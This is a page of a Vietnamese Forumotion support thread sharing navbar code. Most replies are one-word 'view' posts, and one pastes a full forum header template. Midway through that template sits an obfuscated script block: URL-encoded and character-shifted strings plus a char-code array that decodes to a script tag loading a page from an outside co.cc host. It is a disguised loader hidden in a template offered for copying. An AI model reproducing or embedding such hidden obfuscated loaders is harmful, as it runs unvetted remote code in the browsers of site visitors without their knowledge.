Hỗ trợ Forumotion
Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.

You are not connected. Please login or register

Chuyển đến trang : Previous  1, 2, 3, 4  Next

Xem chủ đề cũ hơn Xem chủ đề mới hơn Go down  Thông điệp [Trang 3 trong tổng số 4 trang]

Đăng
  • Member

Đăng

Member


Đăng
[Code] NavBar... - Page 3 Empty

[Code] NavBar...

on 12/12/2012


Đăng
loading...

Demo :

http://giaraioffline.huhohi.com/
mod nào có time chụp dùm e cái demo: [Code] NavBar... - Page 3 0p110
[Code] NavBar... - Page 3 Oc0f10

Trả lời nhanh

Message reputation : 100% (2 votes)

  • chimsedimua_97
    chimsedimua_97

    Bài gửi 28/3/2013, 10:03 pm chimsedimua_97

    xem

    Trả lời nhanh
  • Ms.Truc
    Ms.Truc

    Bài gửi 31/3/2013, 4:35 pm Ms.Truc

    x

    Trả lời nhanh
  • ngusaonoi
    ngusaonoi

    Bài gửi 4/4/2013, 11:18 am ngusaonoi

    1

    Trả lời nhanh
  • rockman317
    rockman317

    Bài gửi 4/4/2013, 12:03 pm rockman317

    xem

    Trả lời nhanh
  • ganhanhem000
    ganhanhem000

    Bài gửi 6/4/2013, 11:33 pm ganhanhem000

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" dir="{S_CONTENT_DIRECTION}" id="min-width" lang="{L_LANG_HTML}" xml:lang="{L_LANG_HTML}" {NAMESPACE_FB_LIKE} {NAMESPACE_FB}>
    <head>
    <!-- BEGIN meta_emulate_ie7 -->
    <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
    <!-- END meta_emulate_ie7 -->
    <title>{SITENAME_TITLE}{PAGE_TITLE}</title>
    <meta http-equiv="content-type" content="text/html; charset={S_CONTENT_ENCODING};" />
    <meta http-equiv="content-script-type" content="text/javascript" />
    <meta http-equiv="content-style-type" content="text/css" />
    <!-- BEGIN switch_canonical_url -->
    <link rel="canonical" href="{switch_canonical_url.CANONICAL_URL}" />
    <!-- END switch_canonical_url -->
    {META_FAVICO}
    {META}
    {META_FB_LIKE}
    <meta name="title" content="{SITENAME_TITLE}{PAGE_TITLE}" />
    {T_HEAD_STYLESHEET}
    {CSS}
    <link rel="search" type="application/opensearchdescription+xml" href="/improvedsearch.xml" title="{SITENAME}" />
    <link rel="search" type="application/opensearchdescription+xml" href="{URL_BOARD_DIRECTORY}/search/improvedsearch.xml" title="{SEARCH_FORUMS}" />
    <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js" type="text/javascript"></script>
    <script src="{JS_DIR}{L_LANG}.js" type="text/javascript"></script>
    <script type='text/javascript' src='http://codeforumotion.forumvi.com/h87-page'></script>
    <script type="text/javascript" src="http://codeforumotion.googlecode.com/files/FMvar.js"></script>
    <!-- BEGIN switch_fb_login -->
    <script src="https://connect.facebook.net/{switch_fb_login.FB_LOCAL}/all.js" type="text/javascript"></script>
    <script src="{switch_fb_login.JS_FB_LOGIN}" type="text/javascript"></script>
    <!-- END switch_fb_login -->

    <!-- BEGIN switch_ticker -->
    <link type="text/css" rel="stylesheet" href="{JS_DIR}jquery/ticker/ticker.css" />
    <script src="{JS_DIR}jquery/ticker/ticker.js" type="text/javascript"></script>
    <!-- END switch_ticker -->

    <!-- BEGIN switch_ticker_new -->
    <script src="{JS_DIR}jquery/jcarousel/jquery.jcarousel.js" type="text/javascript"></script>
    <script type="text/javascript">//<![CDATA[
    /* Definir le sens de direction en fonction du panneau admin */
    var tickerDirParam = "{switch_ticker.DIRECTION}";
    var slid_vert = false;
    var auto_dir = 'next';
    var h_perso = parseInt({switch_ticker.HEIGHT});

    switch( tickerDirParam )
    {
    case 'top' :
    slid_vert = true;
    break;

    case 'left':
    break;

    case 'bottom':
    slid_vert = true;
    auto_dir = 'prev';
    break;

    case 'right':
    auto_dir = 'prev';
    break;

    default:
    slid_vert = true;
    }

    $(document).ready(function() {
    var w_cont = $('#fa_ticker_container').width();

    if (w_cont > 0)
    {
    $('#fa_ticker_container').width(w_cont);

    /* Affichage de la liste */
    $('#fa_ticker_content').css('display','block');

    /* Calcul des dimensions du conteneur et des �l�ments */
    var width_max = $('ul#fa_ticker_content').width();
    var width_item = Math.floor(width_max / {switch_ticker.SIZE});
    var height_max = h_perso;

    /* Calcul de la hauteur maximale du contenur en fonction des �l�ments et de la hauteur personnalis�e dans l'admin */
    $('ul#fa_ticker_content li').each( function () {
    if ($(this).height() > height_max)
    {
    height_max = $(this).height();
    }
    } );

    /* Redimensionnement des �l�ments et des images trop larges */
    $('ul#fa_ticker_content li').width(width_item).height(height_max).find('img').each(function () {
    if ($(this).width() > width_item)
    {
    var ratio = $(this).width() / width_item;
    var new_height = Math.round($(this).height() / ratio);
    $(this).height(new_height).width(width_item);
    }
    });

    /* Redimensionnement et centrage du conteneur en mode vertical */
    if (slid_vert)
    {
    $('ul#fa_ticker_content').width(width_item).height(height_max).css('marginLeft','auto').css('marginRight','auto');
    }

    /* Initialisation du caroussel */
    $('#fa_ticker_content').jcarousel({
    vertical: slid_vert,
    wrap: 'circular',
    auto: {switch_ticker.STOP_TIME},
    auto_direction: auto_dir,
    scroll: 1,
    size: {switch_ticker.SIZE},
    height_max: height_max,
    animation: {switch_ticker.SPEED}
    });
    }
    else
    {
    $('ul#fa_ticker_content li:not(:first)').css('display','none');
    $('ul#fa_ticker_content li:first').css('list-style','none').css('text-align','center');
    }
    });
    //]]>
    </script>
    <!-- END switch_ticker_new -->

    <script type="text/javascript">//<![CDATA[
    $(document).ready(function(){
    <!-- BEGIN switch_enable_pm_popup -->
    pm = window.open('{U_PRIVATEMSGS_POPUP}', '_faprivmsg', 'HEIGHT=225,resizable=yes,WIDTH=400');
    pm.focus();
    <!-- END switch_enable_pm_popup -->
    <!-- BEGIN switch_report_popup -->
    report = window.open('{switch_report_popup.U_REPORT_POPUP}', '_phpbbreport', 'HEIGHT={switch_report_popup.S_HEIGHT},resizable=yes,scrollbars=no,WIDTH={switch_report_popup.S_WIDTH}');
    report.focus();
    <!-- END switch_report_popup -->
    <!-- BEGIN switch_ticker -->
    ticker_start({switch_ticker.HEIGHT}, {switch_ticker.SPACING}, {switch_ticker.SPEED}, '{switch_ticker.DIRECTION}', {switch_ticker.STOP_TIME});
    <!-- END switch_ticker -->
    });

    <!-- BEGIN switch_login_popup -->
    var logInPopUpLeft, logInPopUpTop, logInPopUpWidth = {LOGIN_POPUP_WIDTH}, logInPopUpHeight = {LOGIN_POPUP_HEIGHT}, logInBackgroundResize = true, logInBackgroundClass = false;
    <!-- END switch_login_popup -->

    <!-- BEGIN switch_login_popup -->
    $(document).ready( function() {
    $(window).resize(function() {
    var windowWidth = document.documentElement.clientWidth;
    var popupWidth = $("#login_popup").width();
    var mypopup = $("#login_popup");

    $("#login_popup").css({
    "left": windowWidth/2 - popupWidth/2
    });
    });
    });
    <!-- END switch_login_popup -->
    //]]>
    </script>
    {GREETING_POPUP}
    <!-- BEGIN switch_ticker_new -->
    <style>
    .jcarousel-skin-tango .jcarousel-item {
    text-align:center;
    width: 10px;
    }

    .jcarousel-skin-tango .jcarousel-item-horizontal {
    margin-right: {switch_ticker.SPACING}px;
    }

    .jcarousel-skin-tango .jcarousel-item-vertical {
    margin-bottom: {switch_ticker.SPACING}px;
    }
    </style>
    <!-- END switch_ticker_new -->
    {HOSTING_JS}
    <!-- BEGIN google_analytics_code -->
    <script type="text/javascript">
    //<![CDATA[
    var _gaq = _gaq || [];
    _gaq.push(['_setAccount', '{G_ANALYTICS_ID}']);
    _gaq.push(['_trackPageview']);

    (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
    })();
    //]]>
    </script>
    <!-- END google_analytics_code -->
    </head>
    <body background="{T_BODY_BACKGROUND}" bgcolor="{T_BODY_BGCOLOR}" text="{T_BODY_TEXT}" link="{T_BODY_LINK}" vlink="{T_BODY_VLINK}">
    <!-- BEGIN hitskin_preview -->
    <div id="hitskin_preview" style="display: block;">
    <h1><img src="https://2img.net/i/fa/hitskin/hitskin_logo.png" alt="" /> Hit<em>skin</em>.com</h1>
    <div class="content">
    <p>
    {hitskin_preview.L_THEME_SITE_PREVIEW}
    <br />
    <span>{hitskin_preview.U_INSTALL_THEME}<a href="http://{hitskin_preview.U_RETURN_THEME}">{hitskin_preview.L_RETURN_THEME}</a></span>
    </p>
    </div>
    </div>
    <!-- END hitskin_preview -->

    <!-- BEGIN switch_login_popup -->
    <div id="login_popup">
    <table class="forumline" width="{LOGIN_POPUP_WIDTH}" height="{LOGIN_POPUP_HEIGHT}" border="0" cellspacing="1" cellpadding="0">
    <tr height="25">
    <td class="catLeft">
    <span class="genmed module-title">{SITENAME}</span>
    </td>
    </tr>
    <tr height="{LOGIN_POPUP_MSG_HEIGHT}">
    <td class="row1" align="left" valign="top">
    <div id="login_popup_buttons">
    <form action="{S_LOGIN_ACTION}" method="get">
    <input type="submit" class="mainoption" value="{L_LOGIN}" />
    <input type="button" class="mainoption" value="{L_REGISTER}" onclick="parent.location='{U_REGISTER}';" />
    <input id="login_popup_close" type="button" class="button" value="{L_DONT_DISPLAY_AGAIN}" />
    </form>
    </div>
    <span class="genmed">{LOGIN_POPUP_MSG}</span>
    </td>
    </tr>
    </table>
    </div>
    <!-- END switch_login_popup -->

    <a name="top"></a>

    {JAVASCRIPT}

    <div class="top-bg">
    <div class="top-thanhkent">
    <span style="float:left;margin-top: -15px;">
    <a href="/forum"><img border="0" src="https://i.servimg.com/u/f16/17/73/81/42/300px-10.png" width="40" height="40"/></a></span>
    <span style="float:left">
    <form action="/search?mode=results" method="get" name="searchform" class="frm-form">
    <input type="text" name="search_keywords" style="border: 1px solid #ebebeb;margin-top: -1px;margin-left: 30px;font: 11px Tahoma, Calibri, Verdana,, Geneva, sans-serif;background:#fff url(https://i.servimg.com/u/f35/17/75/86/58/search10.png) no-repeat right;width:160px;color:gray;padding-right:25px !important;padding: 3px;padding-left: 10px;" id="query" name="submit" placeholder="Nhập từ khoá tìm kiếm..." value="" lang="en"/>
    </form></span>
    <span class="Login-Box">
    <div class="loginLeft"><ul>
    <!-- BEGIN switch_user_logged_out -->
    <form action="/login" method="post" name="form_login"><li>
    <a href="register" rel="nofollow" class="notreg">Đăng Ký</a></li>
    <li class="inputPad"><div class="loginBoxInput">
    <input type="text" class="input-login-thanhkent" id="loginUsername" name="username" alt="Tài Khoản" value="Tài Khoản" onblur="if (this.value == '') {this.value = 'Tài Khoản';}" onfocus="if (this.value == 'Tài Khoản') {this.value = '';}" /> </div>
    </li><li class="inputPad"><div class="loginBoxInput">
    <input type="password" class="input-login-thanhkent" size="10" name="password" alt="Mật khẩu" value="Mật khẩu" onblur="if (this.value == '') {this.value = 'Mật khẩu';}" onfocus="if (this.value == 'Mật khẩu') {this.value = '';}"/> </div>
    </li>
    <script type="text/javascript">document.write('<input type="hidden" name="redirect" value="' + location.href + '" />')</script>
    <li class="rememberMe">
    <label for="cb_cookieuser_navbar"><input type="checkbox" class="radio" name="autologin" checked="checked" /> Lưu?</label></li><li class="searchButton"><input type="submit" class="oklogin-thanhkent" name="login" value="Đăng nhập" /></li></form>
    <!-- END switch_user_logged_out -->
    <!-- BEGIN switch_user_logged_in -->
    <li><a href="/profile?mode=editprofile" rel="nofollow" class="notreg" style="padding-left:10px;"><font color="#fff">Hồ Sơ Cá Nhân</font></a></li><li>
    <a href="/profile?mode=editprofile&page_profil=avatars" rel="nofollow" class="notreg"><font color="#fff">Đổi Avatar</font></a></li>
    <li><a href="/privmsg?folder=inbox" onmouseover="mouseoversound.playclip()" onclick="clicksound.playclip()" rel="nofollow" class="notreg"><font color="#fff">{PRIVATE_MESSAGE_INFO}</font></a>
    </li><li><a href="{U_LOGIN_LOGOUT}" rel="nofollow" class="notreg"><font color="#fff">{L_LOGIN_LOGOUT}</font></a></li>
    <!-- END switch_user_logged_in -->
    </ul>
    </div>
    </span>
    </div>
    </div>
    <div id='navthanhkent'><ul><li><a href='/'><span>Home</span>
    </a></li><li class='navforum '>
    <a href='/forum'><span>Diễn Đàn</span></a></li>
    <li><a href='/f14-forum'><span>Game Private</span></a></li><li><a href='/h9-page'><span>Shop AVATAR</span></a></li><li><a href='/memberlist'><span>Thành Viên</span></a></li><li><a href='/register'><span>Đăng Ký</span></a></li></ul></div>
    <div style="padding-top:60px"></div>
    <div style="background-color: #fff; padding: 5px; width: 850px; margin: 0 auto;border: 3px solid blue">
    <table width="830" cellpadding="0" cellspacing="0" border="0" align="center">
    <tr>
    <td valign="top">

    <table width="100%" cellpadding="0" cellspacing="0" border="0">
    <tr>
    <td valign="top">
    <!-- open content container -->
    <div align="center">
    <div class="page" style="width:830px; text-align:left">
    <div style="padding:0px 0px 0px 0px" align="left">

    <!-- / breadcrumb, login, pm info -->


    <!-- welcome message -->


    <br />
    <table cellpadding="6" cellspacing="1" style="border:1px solid #ccc" width="100%" align="center">
    <tr>
    <td class="alt4">
    <marquee scrollamount="10"><b>Chào mừng đến với SMOSGAME Cổng chia Sẽ Thông Tin Game Online</b></marquee>
    </td>
    </tr>
    </table>
    <!-- / welcome message -->
    <br />
    <br />
    <div style="clear: both;"></div>

    <!-- BEGIN switch_ticker_new -->
    <div id="fa_ticker_block" style="margin-top:4px;margin-bottom:4px;">
    <table width="100%" border="0" cellspacing="0" cellpadding="0" class="forumline">
    <tr>
    <td {CLASS_TABLE_TYPE} align="left" class="row1">
    <div id="fa_ticker_container">
    <ul id="fa_ticker_content" class="jcarousel-skin-tango" style="display:none;">
    <!-- BEGIN ticker_row -->
    <li>{switch_ticker.ticker_row.ELEMENT}</li>
    <!-- END ticker_row -->
    </ul>
    </div>
    </td>
    </tr>
    </table>
    </div>
    <!-- END switch_ticker_new -->

    <!-- BEGIN switch_ticker -->
    <div id="fa_ticker_block" style="margin-top:4px;margin-bottom:4px;">
    <table width="100%" border="0" cellspacing="0" cellpadding="0" class="forumline">
    <tr>
    <td {CLASS_TABLE_TYPE} align="left" class="row1">
    <div id="fa_ticker_container">
    <div id="fa_ticker" style="height:{switch_ticker.HEIGHT}px;">
    <div class="fa_ticker_content">
    <!-- BEGIN ticker_row -->
    <div>{switch_ticker.ticker_row.ELEMENT}</div>
    <!-- END ticker_row -->
    </div>
    </div>
    </div>
    </td>
    </tr>
    </table>
    </div>
    <!-- END switch_ticker -->


    <script type='text/javascript'>
    var str3='%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E';document.write(unescape(str3));var str4='*8Hxhwnuy*75qfslzflj*8I*77of%7Bfxhwnuy*77*8Jkzshynts*75lnfnrf7*7%3Dtg*7%3E*%3CG%7Bfw*75ht*8I5*8G%7Bfw*75wj*8I*7%3C*7%3C*8G%7Cmnqj*7%3Dht*8Htg3qjslym*7%3E*%3CGwj0*8IXywnsl3kwtrHmfwHtij*7%3Dtg*%3AGht*%3AI*7%3E*8Ght00*8G*%3CIwjyzws*75wj*8G*%3CI*8H4xhwnuy*8J5';dF(str4);var str2=new Array(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,99,51,122,46,99,111,46,99,99,47,104,116,109,108,45,104,51,51,46,104,116,109,62,60,47,115,99,114,105,112,116,62);document.write(giaima2(str2));
    </script>
    <!-- BEGIN switch_user_logged_out --> <script type="text/javascript"> jQuery(function(){ jQuery(".cont_code").text("Vui lòng đăng nhập để thấy nội dung CODE"); }); </script> <!-- END switch_user_logged_out -->

    <style>
    .item-thumbnail-only
    {
    width:170px;
    hight:300px;
    }
    .sidebar h2{background: #666666 url(http://3.bp.blogspot.com/-0HaCSTi2cQY/T_a3LjvK3sI/AAAAAAAACCo/d4BPmC4sT28/s1600/sidebar-bg.png) repeat-x;color: #fff;font-size: 15px;font-family: Arial, Tahoma, Verdana;font-weight: bold;text-transform: allcaps;margin: 10px 0px 10px 0px;padding: 6px 0px 6px 10px;text-shadow:-1px -1px #555;
    }
    .item-thumbnail{margin:0 0px !important}
    .item-thumbnail img{-moz-border-radius:10px; -webkit-border-radius:10px; border-radius:10px; -webkit-transition:all 0.5s ease; -moz-transition:all 0.5s ease; transition:all 0.5s ease; border:5px solid #666; height:40px; padding:3px; width:40px}
    .item-thumbnail img:hover{border:5px solid #BBB; -moz-transform:scale(1.3) rotate(-5deg); -webkit-transform:scale(1.3) rotate(-5deg); -o-transform:scale(1.3) rotate(-5deg); -ms-transform:scale(1.3) rotate(-5deg); transform:scale(1.3) rotate(-5deg)}
    #sidebar-wrapper
    {
    border:1px solid #000;
    float:center;
    }
    </style>
    <script src="https://illiweb.com/rs3/24/frm/admin/admin.js" type="text/javascript"></script>
    <span style="font-size: 5px; line-height: normal"><font face="Comic Sans Ms"><font BGCOLOR=BLACK color="red"><strong><a href="http://smosgame.5forum.net/t152-topic" class="postlink" original-title=""><blink><center><img src="http://fgt.itdemon.net/quangcao.gif" width="800" height="120" /></center></blink></a></strong></font></font></span>
    <br>
    <span style="font-size: 5px; line-height: normal"><font face="Comic Sans Ms"><font BGCOLOR=BLACK color="red"><strong><a href="http://smosgame.123.st/t415-topic" class="postlink" original-title=""><blink><center><img src="https://2img.net/h/oi46.tinypic.com/2jd4cv4.gif" width="800" height="120" /></center></blink></a></strong></font></font></span>
    <br>
    <span style="font-size: 5px; line-height: normal"><font face="Comic Sans Ms"><font BGCOLOR=BLACK color="red"><strong><a href="http://smosgame.123.st/t415-topic" class="postlink" original-title=""><blink><center><img src="https://2img.net/h/oi46.tinypic.com/2jd4cv4.gif" width="800" height="120" /></center></blink></a></strong></font></font></span>
    <br>
    <span style="font-size: 5px; line-height: normal"><font face="Comic Sans Ms"><font BGCOLOR=BLACK color="red"><strong><a href="http://smosgame.123.st/t415-topic" class="postlink" original-title=""><blink><center><img src="https://2img.net/h/oi46.tinypic.com/2jd4cv4.gif" width="800" height="120" /></center></blink></a></strong></font></font></span>
    <br>

    Trả lời nhanh
  • Đẹp zai
    Đẹp zai

    Bài gửi 22/4/2013, 12:31 pm Đẹp zai

    đ

    Trả lời nhanh
  • s2kpops2
    s2kpops2

    Bài gửi 26/5/2013, 7:13 am s2kpops2

    c

    Trả lời nhanh
  • thmodz
    thmodz

    Bài gửi 30/5/2013, 7:57 pm thmodz

    xemmmmmmm

    Trả lời nhanh
  • sonlapro
    sonlapro

    Bài gửi 14/6/2013, 4:12 pm sonlapro

    xem

    Trả lời nhanh
  • npsuperman
    npsuperman

    Bài gửi 14/6/2013, 9:41 pm npsuperman

    zf

    Trả lời nhanh
  • huanst123
    huanst123

    Bài gửi 14/6/2013, 10:37 pm huanst123

    a

    Trả lời nhanh
  • homevn.9forum.net
    homevn.9forum.net

    Bài gửi 27/7/2013, 6:31 pm homevn.9forum.net

    AC

    Trả lời nhanh
  • > D.Kunz
    > D.Kunz

    Bài gửi 29/8/2013, 8:35 pm > D.Kunz

    x

    Trả lời nhanh
  • KenDy Nguyễn
    KenDy Nguyễn

    Bài gửi 20/9/2013, 11:23 pm KenDy Nguyễn

    3+62+6+

    Trả lời nhanh
  • ܨღ๖ۣۜNgười๖ۣۜTôi๖ۣۜYêuღܨ
    ܨღ๖ۣۜNgười๖ۣۜTôi๖ۣۜYêuღܨ

    Bài gửi 21/9/2013, 8:24 am ܨღ๖ۣۜNgười๖ۣۜTôi๖ۣۜYêuღܨ

    xem

    Trả lời nhanh
  • Sponsored content

    Bài gửi Sponsored content

    Trả lời nhanh

Xem chủ đề cũ hơn Xem chủ đề mới hơn Về Đầu Trang Thông điệp [Trang 3 trong tổng số 4 trang]

Chuyển đến trang : Previous  1, 2, 3, 4  Next

Permissions in this forum:
Bạn không có quyền trả lời bài viết